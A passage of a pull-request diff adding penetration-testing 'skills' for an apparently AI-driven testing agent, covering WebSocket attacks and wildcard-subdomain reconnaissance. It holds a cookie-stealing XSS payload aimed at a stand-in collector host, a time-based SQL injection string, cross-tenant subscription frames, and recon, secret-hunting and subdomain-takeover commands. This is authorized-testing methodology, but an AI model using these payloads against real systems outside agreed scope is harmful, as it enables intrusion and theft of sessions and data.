+- **No auth on socket**: handshake accepted with no cookie/token at all; sensitive channels reachable anonymously.
+- **Auth on handshake only, none per-message**: a valid connection becomes a skeleton key — every subsequent action is trusted. Swap object IDs in messages to reach other users (IDOR), or invoke admin `action`s as a normal user (BFLA).
+- **Token in query string**: `wss://target/ws?token=JWT` leaks into proxy logs, Referer, and browser history. Validate the JWT itself with `jwt_tool` (alg confusion, `none`, weak secret, missing `exp`):
+  ```
+  jwt_tool "<token>" -t wss://target.tld/ws -M at
+  ```
+- **Auth-after-connect race**: server lets you act before the auth message is processed. Send a privileged command in the same burst as (or before) the `auth` frame.
+
+### Message tampering / injection
+The message body is just attacker-controlled input on a path that often lacks WAF and server-side validation:
+- **Type/action confusion & mass assignment**: add fields the client UI never sends.
+  ```json
+  {"action":"updateProfile","userId":1337,"role":"admin","email":"a@b.c"}
+  ```
+- **Injection sinks via frames**: messages rendered in another user's browser (stored/blind XSS), used in DB queries (SQLi/NoSQLi), templates (SSTI), or shelled out (RCE). Verify XSS reaching another viewer with a non-loading marker:
+  ```json
+  {"type":"chat","room":"general","msg":"<img src=x onerror=fetch('//c.example/'+document.cookie)>"}
+  ```
+  SQLi via a filter field:
+  ```
+  wscat -c wss://target.tld/ws
+  > {"action":"search","q":"foo' AND SLEEP(5)-- -"}
+  ```
+- **Blind injection / SSRF over WS**: embed an OAST domain. `interactsh-client -v` (in the sandbox) issues a fresh `*.oast.fun` host; send it in a URL/host field and watch for the callback.
+
+### Channel / subscription isolation failures
+Subscribe to topics outside your tenant/room. ActionCable, STOMP, Socket.IO rooms, and GraphQL subscriptions often trust the client-supplied identifier:
+```
+> {"command":"subscribe","identifier":"{\"channel\":\"AdminChannel\"}"}
+> SUBSCRIBE id:0 destination:/topic/tenant-9999/orders        # STOMP, other tenant
+```
+If you receive another tenant's broadcasts, isolation is broken.
+
+### Transport / infrastructure issues
+- **`wss` downgrade to `ws`**: cleartext fallback enables MITM token capture.
+- **Proxy upgrade smuggling**: inconsistent `Connection`/`Upgrade` handling between front proxy and origin (cross-reference HTTP request smuggling techniques).
+- **DoS**: no max message size, no per-connection rate limit, unbounded concurrent connections, missing idle/ping timeout (slowloris on open sockets).
+- **Reflected data in handshake response** echoing `Sec-WebSocket-Protocol`.
+
+## Validation
+
+1. **CSWSH**: host the PoC page on a different origin, load it in an authenticated browser session, and capture cross-origin delivery of victim data (or an attacker-driven state change) to your collector. The decisive proof is the handshake succeeding with a foreign `Origin` and victim cookies.
+2. **Broken per-message authz**: as user A, send a message referencing user B's resource and show B's data returned, or B's state changed — confirm with B's account or an out-of-band read.
+3. **Injection**: demonstrate effect, not just reflection — XSS firing in a *different* viewer's session, a measurable time delay for SQLi (`SLEEP`), an `interactsh` callback for blind SSRF/injection, or template math evaluation for SSTI.
+4. **Reproducibility**: capture the exact frame sequence (handshake headers + ordered messages) so the finding replays deterministically via `wscat`/script. Note the minimal precondition (e.g., "any logged-in user").
+
+## False Positives
+
+- **`Origin` accepted but no ambient auth**: if the socket requires a token the attacker cannot obtain (not just a cookie), a permissive `Origin` alone is not CSWSH.
+- **101 upgrade with no sensitive data/actions**: HMR/livereload/echo or public-broadcast sockets that expose nothing private.
+- **Self-inflicted XSS**: payload only renders in the sender's own client, never reaching another user.
+- **OAST hit from the tester's host**: callback source IP is your machine/browser, not the server — a client-side fetch, not server-side SSRF.
+- **Timing "SQLi"** explained by network jitter, not the payload — confirm with a clean baseline and a conditional true/false pair.
+- **Subprotocol/echo reflection** with no execution context.
+
+## Chaining & Impact
+
+- CSWSH → read victim's live data and drive authenticated actions (silent account takeover, fund transfer, message exfiltration).
+- Handshake-only auth → per-message IDOR/BFLA → cross-tenant data access and privilege escalation.
+- Message-borne stored XSS in chat/notifications → session theft of every viewer, including admins → full takeover.
+- SQLi/NoSQLi/SSTI/command sink reached via frames → data exfiltration or RCE on the WS worker.
+- Leaked token (query string / `ws` downgrade) → session replay; combine with weak JWT (`jwt_tool`) for forgery.
+- Channel isolation break → mass data leak across tenants; broadcast injection → worm-like propagation to all subscribers.
+
+## Pro Tips
+
+1. Most auth and `Origin` enforcement happens **only** on the one HTTP handshake — attack there first, then assume every later message is implicitly trusted and probe per-message authz.
+2. SameSite cookies do **not** reliably stop CSWSH; the upgrade is a top-level navigation-like GET and is frequently exempt. Always test cross-origin regardless of cookie flags.
+3. Use Burp's WebSockets history to replay and edit individual frames — far faster than rebuilding sessions in `wscat` for each mutation.
+4. Identify the framing first (raw JSON vs Socket.IO's `42["event",{...}]` vs STOMP vs MessagePack). Sending the wrong envelope yields false negatives that look like "not vulnerable."
+5. Tokens in the URL are an immediate finding even before exploitation — they leak via logs, Referer, and history.
+6. Race the auth: fire a privileged command in the same TCP burst as the auth frame to catch order-of-operations bugs.
+7. Hunt dev/HMR sockets (`/_next/webpack-hmr`, `/livereload`, `:35729`) left enabled in production — they often expose source paths and weak controls.
+8. Keep a quiet read-only listener open in one terminal while you inject from another, so you can attribute leaked broadcasts to a specific tampered message.

--- a/strix/skills/web/wildcard_scope.md
+++ b/strix/skills/web/wildcard_scope.md
@@ -1,0 +1,176 @@
+---
+name: wildcard_scope
+description: Wildcard network-scope methodology — enumerate every subdomain, fingerprint each host, and triage the full attack surface
+---
+
+# Wildcard Scope (*.target.tld)
+
+A wildcard scope authorizes testing of every host under a domain (e.g. `*.target.tld`), not a single application. The attacker's objective is breadth-then-depth: discover the complete set of live names and IPs, fingerprint each one, and find the weakest surface — a forgotten staging box, an unclaimed CNAME, an exposed admin panel, or a leaked secret — because in a wildcard scope the win is rarely the flagship app. Coverage is the edge: the host you do not enumerate is the host you do not test.
+
+## Attack Surface
+
+**Names**
+- Apex + all subdomains: `www`, `api`, `app`, `admin`, `staging`, `dev`, `uat`, `internal`, `vpn`, `git`, `jenkins`, `grafana`, `mail`, `cdn`, `assets`
+- Wildcard DNS records (`*.target.tld → x.x.x.x`) that mask which names truly exist
+- Multi-level names: `api.staging.target.tld`, `s3.internal.dev.target.tld`
+- Vanity/partner CNAMEs pointing at third-party SaaS (a frequent takeover source)
+
+**Hosts behind names**
+- Many virtual hosts on one IP (SNI/Host-header routed); enumerate per-name, not per-IP only
+- Non-web ports: SSH, RDP, databases, mail, Redis/Memcached, message brokers, admin daemons
+- Origin servers hiding behind a CDN/WAF (the real attack surface)
+
+**Asset types you will collect**
+- Web apps and APIs (REST/GraphQL/gRPC-web)
+- Dangling DNS pointing at deprovisioned cloud resources (S3, Azure, GitHub Pages, Heroku, Fastly)
+- Dev/CI/observability tooling exposed to the internet
+- Object storage buckets and CDN origins named after the org
+- Source-leak surfaces: exposed `.git`, `.env`, backups, `swagger.json`, `.map` files
+
+## Recon & Enumeration
+
+Most tools below ship in the Kali sandbox. Install missing ones as noted.
+
+**Passive subdomain discovery (no traffic to target)**
+```
+subfinder -d target.tld -all -recursive -o subs_passive.txt
+# Certificate transparency adds names passive sources miss:
+curl -s 'https://crt.sh/?q=%25.target.tld&output=json' | jq -r '.[].name_value' | sed 's/\*\.//' | sort -u >> subs_passive.txt
+amass enum -passive -d target.tld -o subs_amass.txt   # apt install amass
+```
+
+**Active resolution + bruteforce**
+```
+# dnsx: resolve, drop dead names, expand wildcard noise (-wd does wildcard filtering)
+dnsx -l subs_passive.txt -r 1.1.1.1,8.8.8.8 -a -resp -wd target.tld -o resolved.txt
+# Bruteforce permutations against a wordlist:
+dnsx -d target.tld -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -wd target.tld -o subs_brute.txt
+# Permute known names (env/region prefixes):
+gotator -sub subs_passive.txt -perm /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt -depth 1 | dnsx -silent -wd target.tld
+dnsrecon -d target.tld -t std,brt -D /usr/share/seclists/Discovery/DNS/namelist.txt   # apt install dnsrecon
+```
+
+**Wildcard detection (critical first step)**
+```
+# Resolve a guaranteed-bogus name. If it answers, a wildcard record exists and naive bruteforce is meaningless:
+dnsx -d zzzznonexistent-$(date +%s).target.tld -a -resp
+```
+If the random name resolves, rely on dnsx `-wd` filtering and content-diffing rather than DNS existence.
+
+**Liveness + fingerprinting**
+```
+cat resolved.txt subs_brute.txt | sort -u > all_hosts.txt
+httpx -l all_hosts.txt -sc -title -td -server -ip -cname -location \
+  -tls-grab -favicon -jarm -json -o httpx.json
+# tech detection (-td), favicon hash (-favicon) and JARM cluster origins/CDNs.
+```
+
+**Port + service sweep (per host)**
+```
+naabu -l all_hosts.txt -top-ports 1000 -rate 1000 -o ports.txt
+# Service/version detail on the open ports naabu found:
+nmap -sV -sC -Pn -iL <(cut -d: -f1 ports.txt | sort -u) -oA nmap_services
+```
+
+**Per-surface deep recon**
+```
+katana -list live_web.txt -jc -kf all -d 3 -o crawl.txt          # crawl + parse JS for endpoints
+ffuf -u https://HOST/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc 200,204,301,302,401,403 -o ffuf_HOST.json
+nuclei -l live_web.txt -as -s critical,high -rl 50 -c 20 -bs 20 -timeout 10 -retries 1 -j -o nuclei.jsonl
+nuclei -l all_hosts.txt -tags takeover -j -o takeover.jsonl       # subdomain-takeover templates
+wafw00f -i live_web.txt -o wafw00f.txt
+```
+
+**Source/secret exposure (per live web host)**
+```
+trufflehog filesystem ./crawl_dumps --only-verified
+gitleaks dir ./crawl_dumps -v
+# Public repos for the org leak subdomains, creds, internal hostnames:
+trufflehog github --org=TARGET_ORG --only-verified
+```
+
+## Methodology
+
+1. **Confirm authorization & scope shape.** Record the exact wildcard(s), excluded names, allowed ports, rate limits, and OAST policy. Wildcard does not imply third-party SaaS endpoints are in scope.
+2. **Detect wildcard DNS** with a random bogus name before any bruteforce, so you do not chase phantom hosts.
+3. **Passive enumeration first** (subfinder + crt.sh + amass passive) — zero-touch coverage and a baseline name set.
+4. **Active resolution & bruteforce** (dnsx + gotator permutations) with wildcard filtering; merge into one deduped `all_hosts.txt`.
+5. **Liveness & fingerprint** every name with httpx (status, title, tech, TLS SAN, CNAME, favicon, JARM). Use TLS SANs and CNAMEs to discover *more* names — feed them back to step 4 (iterate until no new names).
+6. **Port-sweep** with naabu, then `nmap -sV -sC` the open ports to fingerprint non-web services.
+7. **Triage and rank.** Tag every host: prod / staging / dev / CI / observability / SaaS-CNAME / parked. Prioritize dev/staging/CI and unusual tech first — they hold the soft targets.
+8. **Subdomain takeover sweep** across ALL names (including dead/NXDOMAIN CNAMEs) — see Key Weaknesses.
+9. **Per-host deep dive** on ranked targets: crawl (katana), content-discovery (ffuf), nuclei `-as`, and pivot into the relevant app/vuln skill (SSRF, auth, injection).
+10. **Find the origin** behind CDN/WAF (favicon/JARM cluster, historical DNS, SAN overlap) and re-test it directly — origins often skip the WAF's protections.
+11. **Secret + source exposure** pass on crawled assets and the org's public repos.
+12. **Consolidate**: dedupe findings across hosts, keep the highest-impact instance per vuln class, and document the full host inventory as scope evidence.
+
+## Key Weaknesses / Techniques
+
+**Subdomain takeover (the signature wildcard finding)**
+- A CNAME points at a deprovisioned third-party resource you can re-register.
+```
+nuclei -l all_hosts.txt -tags takeover -j -o takeover.jsonl
+subzy run --targets all_hosts.txt --hide_fails    # go install github.com/PentestPad/subzy@latest
+```
+- Verify the fingerprint manually: `dig +short CNAME sub.target.tld` then `curl -sI https://sub.target.tld`. S3 shows `NoSuchBucket`, GitHub Pages `There isn't a GitHub Pages site here`, Azure `404 Web Site not found`. Claim only the resource the org abandoned (e.g. create the same-named S3 bucket/Heroku app) and serve a benign proof file — never host hostile content.
+
+**Forgotten dev/staging hosts**
+- `dev.`/`staging.`/`uat.` often run debug mode, default creds, no WAF, verbose errors, or pre-prod data. Diff their tech/headers against prod; check `/debug`, `/actuator`, `/.env`, `/swagger-ui`, `/graphql`.
+
+**Origin IP disclosure (CDN/WAF bypass)**
+- Cluster httpx favicon-hash and JARM to spot the non-CDN origin; cross-check historical DNS and TLS SAN overlap. Then request the app directly by IP with the right Host header:
+```
+curl -sk https://ORIGIN_IP/ -H 'Host: app.target.tld' -I
+```
+- A reachable origin frequently lacks the rate-limits/WAF rules that protect the fronted name.
+
+**Exposed source & secrets**
+```
+curl -s https://HOST/.git/HEAD                       # "ref: refs/heads/..." == exposed repo
+git-dumper https://HOST/.git/ ./dump && trufflehog filesystem ./dump --only-verified
+for f in .env .env.bak config.php.bak backup.zip .DS_Store; do curl -s -o /dev/null -w "%{http_code} $f\n" "https://HOST/$f"; done
+```
+
+**Per-host vuln classes** (pivot to the dedicated skill once a surface is identified)
+- Fetchers/importers → SSRF; login/reset flows → auth bypass; search/filter params → SQLi (`sqlmap`), XSS, SSTI; APIs → IDOR/BOLA, GraphQL introspection; JWTs → `jwt_tool`.
+- Default-cred and known-CVE checks on observability/CI hosts (Grafana, Jenkins, Kibana, GitLab) via nuclei `-as`.
+
+## Validation
+
+1. **Inventory is reproducible.** Keep the deduped host list with resolver, timestamp, and source per name so coverage is auditable.
+2. **Takeover PoC:** show the dangling CNAME (`dig`), the third-party error fingerprint (`curl -I`), then claim the resource and serve a unique benign token at the exact path. Screenshot/log both the pre-claim 404 and post-claim 200 of your token.
+3. **Origin bypass PoC:** demonstrate the app responding on the origin IP with the production Host header, and that a protection present on the fronted name (e.g. WAF block, rate-limit) is absent on the origin.
+4. **Exposed source/secret:** download the artifact, show it parses (`git log`, valid `.env` keys), and — only if safe and authorized — confirm one credential authenticates against a non-destructive endpoint.
+5. **Per-host findings:** confirm with the validation steps in the matching vuln skill (real server-side effect, not a reflected mock).
+6. Use `interactsh-client` for any blind/OAST confirmation; verify the callback source IP is the *target* host, not your tester box.
+
+## False Positives
+
+- **Wildcard DNS mirage:** every random name "resolves" because `*.target.tld` exists — these are not real hosts. Always run the bogus-name check and use dnsx `-wd`.
+- **Shared-IP virtual hosts:** an open port on a shared CDN/cloud IP is not necessarily this org's service — confirm via Host header and TLS SAN before reporting.
+- **Live CNAME, healthy backend:** a CNAME to a third party is only a takeover if the backend resource is unclaimable AND shows the deprovisioned fingerprint. A working SaaS page is not a takeover.
+- **Parked/marketing pages:** default vendor landing pages and "coming soon" hosts are usually no-impact.
+- **`403`/`401` from a directory bruteforce** often means "exists but protected," not access — verify before claiming exposure.
+- **Out-of-scope SaaS:** `target.zendesk.com`-style names live on a third-party domain, not `*.target.tld` — confirm against the authorized scope.
+- **Stale historical names** from CT logs/passive sources that no longer resolve — drop anything dnsx cannot resolve unless takeover-relevant (NXDOMAIN CNAME).
+
+## Chaining & Impact
+
+- Subdomain takeover → host malicious content on a trusted name → steal sessions/credentials via same-site cookies, bypass CSP/CORS allowlists, or phish under the brand.
+- Forgotten staging with debug/default creds → admin access → pivot into shared databases or internal networks reused across environments.
+- Exposed `.git`/`.env` → source + secrets → cloud keys / DB creds → data access or further lateral movement.
+- Origin IP discovery → WAF bypass → previously-blocked SQLi/RCE now reachable on the unprotected backend.
+- Internal/VPN/CI host exposure → credential capture → into the corporate network.
+- The compounding effect: enumerating ALL names turns one weak host into a foothold for the entire estate — breadth is what makes wildcard scope dangerous.
+
+## Pro Tips
+
+1. Enumeration is iterative, not one-shot: TLS SANs, CNAME chains, and crawled JS constantly reveal new names — loop dnsx/httpx until the set stops growing.
+2. Run the bogus-name wildcard check before bruteforce; skipping it wastes hours on phantom hosts and pollutes the inventory.
+3. Favicon hash + JARM cluster hosts by real backend — fast way to group an estate and spot the origin hiding behind a CDN.
+4. The valuable host is rarely the flagship: chase `dev`/`staging`/`uat`/`old`/`legacy`/`test` and odd tech stacks first.
+5. CT logs (crt.sh) surface internal names that never appear in passive feeds — including ones that resolve only on internal DNS, useful as leads.
+6. Always also test the apex and `www`; teams harden the obvious name and forget the rest.
+7. Keep rate limits explicit (naabu `-rate`, nuclei `-rl/-c/-bs`) — a wildcard sweep across thousands of names can self-DoS or get you blocked.
+8. Re-scan periodically: wildcard estates change as teams spin up and tear down infra; a clean scan last month may have a fresh takeover today.
+9. Dead CNAMEs (NXDOMAIN) are not noise — they are prime takeover candidates; keep them in the inventory, not the trash.


### PR DESCRIPTION
## What

Adds deep per-asset methodology **skills** for Web asset types (domain, URL, subdomain, API, WebSocket, gRPC, wildcard).

Part of the asset-coverage effort (foundation in #533, which adds the asset taxonomy + detection + recommended-skill hooks). These files provide the deep methodology each asset type's recommendation points at.

## Skills added

- `strix/skills/web/api_security.md`
- `strix/skills/web/domain.md`
- `strix/skills/web/grpc.md`
- `strix/skills/web/subdomain.md`
- `strix/skills/web/url.md`
- `strix/skills/web/websocket.md`
- `strix/skills/web/wildcard_scope.md`

## Notes

- Markdown only; no code changes. Auto-discovered by the skills loader (`get_available_skills` / `load_skills`), so they appear in `available_skills` and are loadable via `load_skill` or `create_agent(skills=[...])`.
- Each follows the house template/tone (cf. `vulnerabilities/ssrf.md`).
- No filename overlap with #532 (complementary asset coverage).
